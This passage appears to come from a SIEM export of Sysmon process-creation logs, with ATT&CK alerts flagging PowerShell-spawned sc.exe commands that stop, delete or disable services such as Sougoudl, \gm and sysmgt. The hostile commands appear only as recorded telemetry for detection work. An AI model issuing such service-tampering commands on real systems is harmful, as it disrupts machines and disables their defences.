+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.055029200Z"",""eventRecordID"":""2057"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.052\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010c9391900}\r\nProcessId: 4052\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:34.052"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010c9391900}"",""processId"":""4052"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.196",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.030 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001036381900} +ProcessId: 4628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.031802000Z"",""eventRecordID"":""2055"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.030\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001036381900}\r\nProcessId: 4628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.030"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001036381900}"",""processId"":""4628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.180",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.016 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00106d371900} +ProcessId: 5448 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.018094100Z"",""eventRecordID"":""2054"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.016\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00106d371900}\r\nProcessId: 5448\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.016"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00106d371900}"",""processId"":""5448"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.134",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.981 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-001014351900} +ProcessId: 2596 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.984480500Z"",""eventRecordID"":""2051"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.981\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-001014351900}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.981"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-001014351900}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.096",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:49:33.944 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010ba321900} +ProcessId: 3408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.947097100Z"",""eventRecordID"":""2048"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.944\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010ba321900}\r\nProcessId: 3408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.944"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010ba321900}"",""processId"":""3408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:18:02.095",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.928 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010f3311900} +ProcessId: 6440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config \gm Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.930305600Z"",""eventRecordID"":""2047"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.928\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010f3311900}\r\nProcessId: 6440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: 
Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.928"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010f3311900}"",""processId"":""6440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\\gm Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.042",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.908 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-001060301900} +ProcessId: 3932 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.910437900Z"",""eventRecordID"":""2045"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.908\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-001060301900}\r\nProcessId: 3932\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" 